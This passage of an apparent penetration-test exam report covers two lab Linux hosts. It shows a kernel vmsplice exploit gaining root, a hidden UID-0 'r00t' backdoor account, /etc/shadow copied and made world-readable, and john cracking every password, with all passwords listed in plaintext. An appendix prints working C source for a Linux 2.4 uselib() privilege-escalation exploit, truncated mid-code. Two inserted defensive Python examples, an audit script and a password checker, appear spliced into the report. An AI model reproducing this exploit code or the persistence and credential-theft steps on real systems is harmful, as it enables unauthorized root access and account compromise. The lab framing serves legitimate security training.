-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15  2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ gcc -o jessica_biel_naked_in_my_bed jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ll
total 28
-rwxrwxr-x 1 cptvm1 cptvm1 8522 Feb  7 04:05 jessica_biel_naked_in_my_bed
-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15  2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ./jessica_biel_naked_in_my_bed
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f36000 .. 0xb7f68000
[+] root
[root@localhost kernel26_vmsplice]# id
uid=0(root) gid=0(root) groups=500(cptvm1)
[root@localhost kernel26_vmsplice]#

ii. Maintaining access via creation of a new “r00t” account

After the successful use of the Kernel vmsplice exploit, consistent root access to the cptvm2 host was required.

The creation of a new user account having the same user id and group id as the real root account was accomplished via the standard Linux useradd utility. After the creation of the account, the password was set to “windows”. The previous password generation mistake of setting a “tough” password was not repeated.

[root@localhost kernel26_vmsplice]# env
SSH_AGENT_PID=3134
HOSTNAME=localhost.localdomain
TERM=xterm
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
HISTSIZE=1000
GTK_RC_FILES=/etc/gtk/gtkrc:/home/cptvm1/.gtkrc-1.2-gnome2
WINDOWID=48234577
USER=cptvm1
LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32:*.btm=00;32:*.bat=00;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=00;31:*.taz=00;31:*.lzh=00;31:*.zip=00;31:*.z=00;31:*.Z=00;31:*.gz=00;31:*.bz2=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31:*.cpio=00;31:*.jpg=00;35:*.gif=00;35:*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*.tif=00;35:
SSH_AUTH_SOCK=/tmp/ssh-aqCddQ3075/agent.3075
GNOME_KEYRING_SOCKET=/tmp/keyring-euEoqc/socket
USERNAME=cptvm1
SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/3075
PATH=/usr/kerberos/sbin:/usr/bin:/usr/sbin:/bin:/sbin:/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:/usr/X11R6/bin:/home/cptvm1/bin
DESKTOP_SESSION=default
MAIL=/var/spool/mail/cptvm1
GDM_XSERVER_LOCATION=local
PWD=/home/cptvm1/cpt/exploits/kernel26_vmsplice
INPUTRC=/etc/inputrc
XMODIFIERS=@im=none
LANG=en_US.UTF-8
GDMSESSION=default
SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass
SHLVL=3
HOME=/home/cptvm1
GNOME_DESKTOP_SESSION_ID=Default
LOGNAME=cptvm1
CVS_RSH=ssh
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-yuVqOWjtSW,guid=f9418d49bbcbb5875e2b080cbf709f00
LESSOPEN=|/usr/bin/lesspipe.sh %s
DISPLAY=:0.0
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
XAUTHORITY=/tmp/.gdmI40NOU
COLORTERM=gnome-terminal
_=/usr/bin/env
[root@localhost kernel26_vmsplice]# useradd -u 0 -o -g 0 -d /root r00t
useradd: warning: the home directory already exists.
Not copying any file from skel directory into it.
[root@localhost kernel26_vmsplice]# passwd r00t
Changing password for user r00t.
New UNIX password:
BAD PASSWORD: it is based on a dictionary word
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
[root@localhost kernel26_vmsplice]#

iii. Gathering the shadow password file

With the successful creation of a method to gain root access in the future, the gathering of the shadow password file could be accomplished. In this case, the shadow password file was copied within the shell created by the Kernel vmsplice exploit. However, it could have also been gathered via the new “r00t” account.

[root@localhost kernel26_vmsplice]# cp /etc/shadow /tmp
[root@localhost kernel26_vmsplice]# chmod a+rw /tmp/shadow
[root@localhost kernel26_vmsplice]# cd /tmp
[root@localhost tmp]# ls -alF shadow
-rw-rw-rw- 1 root root 1235 Feb  7 04:08 shadow
[root@localhost tmp]#

J. Cracking passwords of the cptvm2 host

i. Cracking of “cptvm1”, “cptvm2”, “root” and “r00t”

The cracking of the cptvm2 accounts was trivial in comparison to the time the cptvm1 host had already taken (over 10 hours). Using only the default dictionary within john, the entire process took just over 6 minutes to complete. This was due to the existence of the root password within the standard john wordlist.

bt cptvm2 # john --session=cptvm2 shadow
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32])
admin            (root)
windows          (cptvm1)
windows          (r00t)
linux            (cptvm2)
guesses: 4  time: 0:00:06:13 (3)  c/s: 4533  trying: linux

bt cptvm2 # john -show shadow
root:admin:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::
r00t:windows:14282:0:99999:7:::

4 password hashes cracked, 0 left
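The “r00t” accounts created in sections G.iv and I.ii leave two traces a defender can look for: a second UID-0 entry in /etc/passwd, and a shadow entry whose lastchg field (days since 1970-01-01) is far later than the rest of the host's, as the 14282 against 14019 in the output above shows. The following audit is an added example, not code from the report; its two sample files are constructed to resemble the cptvm2 entries and use dummy hashes.

```python
"""Audit passwd/shadow text for the traces a 'useradd -u 0 -o' account leaves.

Added example (not from the report). Checks: (1) any UID-0 user other than
root, and (2) any shadow entry whose password was set later than root's.
"""
from datetime import date, timedelta

# Constructed sample modelled on the cptvm2 host: r00t is a second UID-0 user.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
cptvm1:x:500:500::/home/cptvm1:/bin/bash
cptvm2:x:501:501::/home/cptvm2:/bin/bash
r00t:x:0:0::/root:/bin/bash
"""

# Constructed shadow lines with dummy hashes; the lastchg values (third field)
# are the ones john -show printed for cptvm2 above.
SAMPLE_SHADOW = """\
root:$1$DUMMYSALT$DUMMYHASHxxxxxxxxxxxxxxx:14019:0:99999:7:::
bin:*:14019:0:99999:7:::
cptvm1:$1$DUMMYSALT$DUMMYHASHxxxxxxxxxxxxxxx:14019:0:99999:7:::
cptvm2:$1$DUMMYSALT$DUMMYHASHxxxxxxxxxxxxxxx:14019:0:99999:7:::
r00t:$1$DUMMYSALT$DUMMYHASHxxxxxxxxxxxxxxx:14282:0:99999:7:::
"""

EPOCH = date(1970, 1, 1)


def parse_colon_file(text):
    """Yield the ':'-separated fields of each non-blank line of a passwd/shadow file."""
    for line in text.splitlines():
        if line.strip():
            yield line.split(":")


def extra_uid0_accounts(passwd_text):
    """Usernames other than 'root' whose UID field is 0 (duplicate-root accounts)."""
    return [f[0] for f in parse_colon_file(passwd_text)
            if f[2] == "0" and f[0] != "root"]


def lastchg_to_iso(days_field):
    """Convert the shadow lastchg field (days since the epoch) to an ISO date."""
    return (EPOCH + timedelta(days=int(days_field))).isoformat()


def passwords_set_after(shadow_text, reference_user="root"):
    """(user, iso_date) for entries whose lastchg is later than reference_user's.

    On a freshly built host every account shares one lastchg value; a lone
    later value marks a password that was (re)set after installation.
    """
    entries = {f[0]: f[2] for f in parse_colon_file(shadow_text) if f[2]}
    reference = int(entries[reference_user])
    return [(user, lastchg_to_iso(days)) for user, days in entries.items()
            if int(days) > reference]


def audit(passwd_text, shadow_text):
    """Run both checks and return the findings as a dict."""
    return {
        "extra_uid0": extra_uid0_accounts(passwd_text),
        "recent_password_changes": passwords_set_after(shadow_text),
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_PASSWD, SAMPLE_SHADOW).items():
        print(f"{key}: {value}")
```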

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:

7/tcp     echo
21/tcp    ftp       vsftpd 1.1.3
22/tcp    ssh       OpenSSH 3.5p1 (protocol 1.99)
23/tcp    telnet    Linux telnetd
79/tcp    finger    Linux fingerd
80/tcp    http      Apache httpd 2.0.40 (Red Hat Linux)
109/tcp   POSSIBLY pop2
110/tcp   pop3      ipopd 2001.78rh
111/tcp   rpcbind   2 (rpc #100000)
143/tcp   imap      UW Imapd 2001.315rh
199/tcp   smux      Linux SNMP multiplexer
443/tcp   ssl/http  Apache httpd 2.0.40 (Red Hat Linux)
686/tcp   rquotad   1-2 (rpc #100011)
993/tcp   imaps
995/tcp   pop3s
6000/tcp  X11
32768/tcp status    1 (rpc #100024)
32770/tcp mountd    1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:

7/udp     echo
13/udp    daytime
37/udp    time (32 bits)
111/udp   rpcbind   2 (rpc #100000)
123/udp   ntp
161/udp   snmp      SNMPv1 server (public)
162/udp   snmptrap
631/udp   unknown
683/udp   rquotad   1-2 (rpc #100011)

User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec, /sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart, /usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd, /sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper, /bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage, /usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute, /usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)

Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:

22/tcp    ssh       OpenSSH 4.3 (protocol 2.0)
111/tcp   rpcbind   2 (rpc #100000)
939/tcp   status    1 (rpc #100024)

User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtab-lock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh, /usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth, /bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs, /sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs, /sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage, /usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin

K. Cracking passwords of the cptvm1 host – round 2

i. Cracking of “root” and “r00t”

At this point, the john utility had been running for quite some time without success. With such a difference in the amount of john run time between the cptvm1 and cptvm2 hosts, research into why was begun.

Comparing the default wordlist used by john to the one that had been used during the brute force hydra attack showed that the john wordlist was far smaller. The original assumption was that the default john wordlist would most likely be optimized for password cracking. Therefore, the default wordlist was used as is.

As all of the passwords discovered so far were standard dictionary words, it seemed logical that the rest of the passwords would most likely be dictionary words, too. With this in mind, a larger wordlist would be required. To generate this wordlist, the aspell master English dictionary was dumped, cleaned up and sorted. This resulted in a dictionary of roughly 118,000 words.

bt passwords # aspell dump master | sed s/\'//g | sort -u > matt.txt
bt passwords # wc -l matt.txt
118051 matt.txt
bt passwords # mv matt.txt 118051wordDictionary.txt
bt passwords # ll 118051wordDictionary.txt
-rw-r--r-- 1 503 503 1097205 Feb 15 23:05 118051wordDictionary.txt

With this new approach in mind, additional john sessions were created to use the googled password.txt file and the newly generated aspell dumped file. The results were far more impressive than anticipated. Within 2 seconds, the password for the root account had been cracked.

bt cptvm1 # john --session=cptvm1-3 --users=root --wordlist=../passwords/118051wordDictionary.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
cavalry          (root)
guesses: 1  time: 0:00:00:02 100%  c/s: 5511  trying: cavalry

At this point, the john session that had been started to use the googled password.txt file as a wordlist was aborted.

bt cptvm1 # john --session=cptvm1-2 --users=root --wordlist=../passwords/passwords.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:00:22 100%  c/s: 5502  trying: Ôªø!

In addition, the initial john session was also aborted. I want those 11 hours of my life back, certification crew! :)

bt cptvm1 # john --session=cptvm1 --users=root shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0  time: 0:10:53:47 (3)  c/s: 5722  trying: 35885297
Session aborted

Since we already know that the password to the r00t account is expl0ited, this last step wasn't really required. However, to be 100% complete, a john session was started to crack the r00t account. I cheated and placed the “expl0ited” password in the wordlist. As expected, john was able to crack the password in near record time.

bt cptvm1 # rm cptvm1.rec

bt cptvm1 # john --session=cptvm1 --users=r00t --wordlist=../passwords/118051wordDictionary.txt shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])
expl0ited        (r00t)
guesses: 1  time: 0:00:00:09 100%  c/s: 4707  trying: expl0ited
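The lesson of this section is that every password on both hosts was a dictionary word or, in the case of “expl0ited”, a dictionary word with one digit substituted, which is exactly what the “BAD PASSWORD: it is based on a dictionary word” message from passwd had flagged. The checker below is an added example, not code from the report: it repeats the aspell clean-up (drop apostrophes, unique, sort) in Python and then tests candidate passwords against the resulting wordlist, undoing common digit-for-letter substitutions first. RAW_DICTIONARY_DUMP is a constructed handful of words standing in for the 118,051-word aspell dump.

```python
"""Wordlist normalisation and a 'based on a dictionary word' password check.

Added example (not from the report). The dictionary is a small constructed
stand-in for `aspell dump master`; the substitution table is deliberately
short, a production checker such as cracklib tries far more variants.
"""

# Constructed stand-in for `aspell dump master` output, apostrophes included.
RAW_DICTIONARY_DUMP = """\
cavalry
cavalry's
windows
Windows
linux
digital
exploited
exploited
admin
"""

# Common leet substitutions, reversed (0 -> o, 3 -> e, ...).
DELEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                        "5": "s", "7": "t", "@": "a", "$": "s"})


def normalise_wordlist(dump_text):
    """Equivalent of  sed s/\\'//g | sort -u  applied to an aspell dump."""
    words = {line.replace("'", "").strip() for line in dump_text.splitlines()}
    words.discard("")
    return sorted(words)          # codepoint order, like sort -u in the C locale


def candidate_forms(password):
    """Forms to look up, in order: as typed, lowercased, lowercased and de-leeted."""
    forms = [password, password.lower(), password.lower().translate(DELEET)]
    unique = []
    for form in forms:
        if form not in unique:
            unique.append(form)
    return unique


def dictionary_based(password, wordlist):
    """Return the dictionary word the password is based on, or None if none."""
    lookup = {w.lower() for w in wordlist}
    for form in candidate_forms(password):
        if form.lower() in lookup:
            return form.lower()
    return None


def weak_passwords(passwords, wordlist):
    """Map each weak password to the dictionary word it is based on."""
    result = {}
    for password in passwords:
        base = dictionary_based(password, wordlist)
        if base is not None:
            result[password] = base
    return result


if __name__ == "__main__":
    wordlist = normalise_wordlist(RAW_DICTIONARY_DUMP)
    # The report's passwords plus one that is not dictionary-based.
    print(weak_passwords(["cavalry", "admin", "windows", "linux",
                          "expl0ited", "Tr0ub4dor&3"], wordlist))
```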


Ultimately, all of the cptvm1 account passwords were cracked.

bt cptvm1 # john -show shadow
root:cavalry:14019:0:99999:7:::
user:digital:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::
r00t:expl0ited:14272:0:99999:7:::

5 password hashes cracked, 0 left

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:

7/tcp     echo
21/tcp    ftp       vsftpd 1.1.3
22/tcp    ssh       OpenSSH 3.5p1 (protocol 1.99)
23/tcp    telnet    Linux telnetd
79/tcp    finger    Linux fingerd
80/tcp    http      Apache httpd 2.0.40 (Red Hat Linux)
109/tcp   POSSIBLY pop2
110/tcp   pop3      ipopd 2001.78rh
111/tcp   rpcbind   2 (rpc #100000)
143/tcp   imap      UW Imapd 2001.315rh
199/tcp   smux      Linux SNMP multiplexer
443/tcp   ssl/http  Apache httpd 2.0.40 (Red Hat Linux)
686/tcp   rquotad   1-2 (rpc #100011)
993/tcp   imaps
995/tcp   pop3s
6000/tcp  X11
32768/tcp status    1 (rpc #100024)
32770/tcp mountd    1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:

7/udp     echo
13/udp    daytime
37/udp    time (32 bits)
111/udp   rpcbind   2 (rpc #100000)
123/udp   ntp
161/udp   snmp      SNMPv1 server (public)
162/udp   snmptrap
631/udp   unknown
683/udp   rquotad   1-2 (rpc #100011)

User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec, /sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart, /usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd, /sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper, /bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage, /usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute, /usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux, r00t/expl0ited, root/cavalry

cptvm2 (192.168.1.104)

Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:

22/tcp    ssh       OpenSSH 4.3 (protocol 2.0)
111/tcp   rpcbind   2 (rpc #100000)
939/tcp   status    1 (rpc #100024)

User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /media/.hal-mtab-lock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn, /usr/bin/chsh, /usr/sbin/userhelper, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth, /bin/mount, /bin/ping, /bin/ping6, /bin/su, /bin/umount, /sbin/mount.nfs, /sbin/mount.nfs4, /sbin/pam_timestamp_check, /sbin/umount.nfs, /sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at, /usr/bin/chage, /usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu, /usr/libexec/openssh/ssh-keysign, /usr/sbin/ccreds_validate, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux, r00t/windows, root/admin

L. Ultimate goal

i. Cptvm1 and cptvm2 hosts compromised

Initial access to the cptvm1 host was obtained by brute force password guessing of the “user” account. After gaining basic access to the cptvm1 host, the “cptvm1” and “cptvm2” user accounts were brute force password attacked. This provided basic access to the cptvm2 host. The cptvm1 host was then compromised via a VMA exploit. Next, the cptvm2 host was compromised via a vmsplice exploit. Finally, the root passwords were cracked.

ii. Passwords for root accounts on cptvm1 and cptvm2

The password for root@cptvm1 is cavalry
The password for root@cptvm2 is admin

M. Lessons learned

i. Searching exploit sites

The quality of the exploits and exploit information varies radically between sites. For example, the milw0rm.com site has good quality code but limited information on the background of the exploit. In contrast, the www.securityfocus.com site has more extensive information about an exploit but may only list “Exploit code has been published” instead of actual exploit code.

With such a wide footprint for searches in mind, a site like secwatch.org should be the preferred solution. However, it was found that certain searches don't perform well via secwatch.org.

The use of a single site to complete exploit research isn't going to be a successful approach at this time.

ii. Attack vectors

All of the articles that I have read and the individuals that I have spoken with lately state that the majority of future exploits will be found outside of the operating system. With this in mind, I focused my search on items surrounding the kernel but waited to research the kernel exploits until the end. This proved to be exactly the opposite of the approach that was required for this examination.

Full research into the vulnerabilities of a target prior to attempting to execute any exploits is key. If this approach had been adhered to more closely, a full review of all of the vulnerabilities would have yielded the kernel exploits as the top contenders. This would have saved quite a bit of time compiling, debugging and testing unsuccessful exploits.

5. Appendix

A. Source code for the Kernel 2.4 VMA exploit/* * Linux kernel 2.4 uselib() privilege elevation exploit. * * original exploit source from http://isec.pl * reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt * * I modified the Paul Starzetz's exploit, made it more possible * to race successfully. The exploit still works only on 2.4 series. * It should be also works on 2.4 SMP, but not easy. * * thx newbug. * * Tim Hsu <timhsu at chroot.org> Jan 2005. * */ #define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <signal.h>
#include <syscall.h>
#include <limits.h>

#include <sys/types.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <sys/sysinfo.h>

#include <linux/elf.h>
#include <linux/linkage.h>

#include <asm/page.h>
#include <asm/ldt.h>
#include <asm/segment.h>

#define str(s) #s
#define xstr(s) str(s)

#define MREMAP_MAYMOVE 1

// temp lib location
#define LIBNAME "/tmp/_elf_lib"

// shell name
#define SHELL "/bin/bash"

// time delta to detect race
#define RACEDELTA 5000

// if you have more deadbabes in memory, change this
#define MAGIC 0xdeadbabe

// do not touch
#define SLAB_THRSH 128
#define SLAB_PER_CHLD (INT_MAX - 1)
#define LIB_SIZE ( PAGE_SIZE * 4 )
#define STACK_SIZE ( PAGE_SIZE * 4 )

#define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE )

#define ENTRY_GATE ( LDT_ENTRIES-1 )
#define SEL_GATE ( (ENTRY_GATE<<3)|0x07 )

#define ENTRY_LCS ( ENTRY_GATE-2 )
#define SEL_LCS ( (ENTRY_LCS<<3)|0x04 )

#define ENTRY_LDS ( ENTRY_GATE-1 )
#define SEL_LDS ( (ENTRY_LDS<<3)|0x04 )

#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB

#define TMPLEN 256
#define PGD_SIZE ( PAGE_SIZE*1024 )

extern char **environ;

static char cstack[STACK_SIZE];
static char name[TMPLEN];
static char line[TMPLEN];

static pid_t consume_pid;

static volatile int
	val = 0,
	go = 0,
	finish = 0,
	scnt = 0,
	ccnt = 0,
	delta = 0,
	delta_max = RACEDELTA,
	map_flags = PROT_WRITE|PROT_READ;

static int
	fstop = 0,
	silent = 0,
	pidx,
	pnum = 0,
	smp_max = 0,
	smp,
	wtime = 2,
	cpid,
	uid,
	task_size,
	old_esp,
	lib_addr,
	map_count = 0,
	map_base = 0,
	map_addr,
	addr_min,
	addr_max,
	vma_start,
	vma_end,
	max_page;

static struct timeval tm1, tm2;

static char *myenv[] = {
	"TERM=vt100",
	"HISTFILE=/dev/null",
	NULL
};

static char hellc0de[] =
	"\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70"
	"\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75\x65\x52\x00";

static char *pagemap, *libname = LIBNAME, *shellname = SHELL;

#define __NR_sys_gettimeofday __NR_gettimeofday
#define __NR_sys_sched_yield __NR_sched_yield
#define __NR_sys_madvise __NR_madvise
#define __NR_sys_uselib __NR_uselib
#define __NR_sys_mmap2 __NR_mmap2
#define __NR_sys_munmap __NR_munmap
#define __NR_sys_mprotect __NR_mprotect
#define __NR_sys_mremap __NR_mremap

inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f);

inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e);

inline _syscall3(int, sys_madvise, void*, a, int, b, int, c);
inline _syscall3(int, sys_mprotect, int, a, int, b, int, c);
inline _syscall3(int, modify_ldt, int, func, void *, ptr, int, bytecount);

inline _syscall2(int, sys_gettimeofday, void*, a, void*, b);
inline _syscall2(int, sys_munmap, int, a, int, b);

inline _syscall1(int, sys_uselib, char*, l);

inline _syscall0(void, sys_sched_yield);

// helper child: grab all free RAM so the kernel is more likely to sleep in kmalloc
int consume_memory()
{
	struct sysinfo info;
	char *vmem;

	sysinfo(&info);
	vmem = malloc(info.freeram);
	if (vmem == NULL) {
		perror("malloc");
		return -1;
	}
	memset(vmem, 0x90, info.freeram);
	return 0;
}

inline int tmdiff(struct timeval *t1, struct timeval *t2)
{
	int r;

	r = t2->tv_sec - t1->tv_sec;
	r *= 1000000;
	r += t2->tv_usec - t1->tv_usec;

	return r;
}

void fatal(const char *message, int critical)
{
	int sig = critical ? SIGSTOP : (fstop ? SIGSTOP : SIGKILL);

	if (!errno) {
		fprintf(stdout, "\n[-] FAILED: %s ", message);
	} else {
		fprintf(stdout, "\n[-] FAILED: %s (%s) ", message,
			(char*) (strerror(errno)));
	}
	if (critical)
		printf("\nCRITICAL, entering endless loop");
	printf("\n");
	fflush(stdout);

	unlink(libname);
	kill(cpid, SIGKILL);
	for (;;) kill(0, sig);
}

// try to race do_brk sleeping on kmalloc, may need modification for SMP
int raceme(void* v)
{
	finish = 1;

	for (;;) {
		errno = 0;

		// check if raced:
recheck:
		if (!go) sys_sched_yield();

		sys_gettimeofday(&tm2, NULL);
		delta = tmdiff(&tm1, &tm2);
		if (!smp_max && delta < (unsigned)delta_max) goto recheck;
		smp = smp_max;

		// check if lib VMAs exist as expected under race condition
recheck2:
		val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL);
		if (val) continue;
		errno = 0;
		val = sys_madvise((void*) (lib_addr+PAGE_SIZE),
				  LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
		if (!val || (val<0 && errno!=ENOMEM)) continue;

		// SMP?
		smp--;
		if (smp>=0) goto recheck2;

		// recheck race
		if (!go) continue;
		finish++;

		// we need to free one vm_area_struct for mmap to work
		val = sys_mprotect(map_addr, PAGE_SIZE, map_flags);
		if (val) fatal("mprotect", 0);
		val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE,
				MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
		if (-1==val) fatal("mmap2 race", 0);
		printf("\n[+] race won maps=%d", map_count); fflush(stdout);
		kill(consume_pid, SIGKILL);
		_exit(0);
	}

	return 0;
}

int callme_1()
{
	return val++;
}

inline int valid_ptr(unsigned ptr)
{
	return ptr>=task_size && ptr<addr_min-16;
}

inline int validate_vma(unsigned *p, unsigned s, unsigned e)
{
	unsigned *t;

	if (valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) {
		t = (unsigned*)p[3];
		if (t[0]==p[0] && t[1]<=task_size && t[2]<=task_size)
			return 1;
	}
	return 0;
}

asmlinkage void kernel_code(unsigned *task)
{
	unsigned *addr = task;

	// find & reset uids
	while (addr[0] != uid || addr[1] != uid || addr[2] != uid || addr[3] != uid)
		addr++;

	addr[0] = addr[1] = addr[2] = addr[3] = 0;
	addr[4] = addr[5] = addr[6] = addr[7] = 0;

	// find & correct VMA
	for (addr=(unsigned *)task_size; (unsigned)addr<addr_min-16; addr++) {
		if (validate_vma(addr, vma_start, vma_end)) {
			addr[1] = task_size - PAGE_SIZE;
			addr[2] = task_size;
			break;
		}
	}
}

void kcode(void);

// CPL0 code mostly stolen from cliph
void __kcode(void)
{
	asm(
		"kcode:                         \n"
		"	pusha                       \n"
		"	pushl %es                   \n"
		"	pushl %ds                   \n"
		"	movl $(" xstr(SEL_LDS) ") ,%edx\n"
		"	movl %edx,%es               \n"
		"	movl %edx,%ds               \n"
		"	movl $0xffffe000,%eax       \n"
		"	andl %esp,%eax              \n"
		"	pushl %eax                  \n"
		"	call kernel_code            \n"
		"	addl $4, %esp               \n"
		"	popl %ds                    \n"
		"	popl %es                    \n"
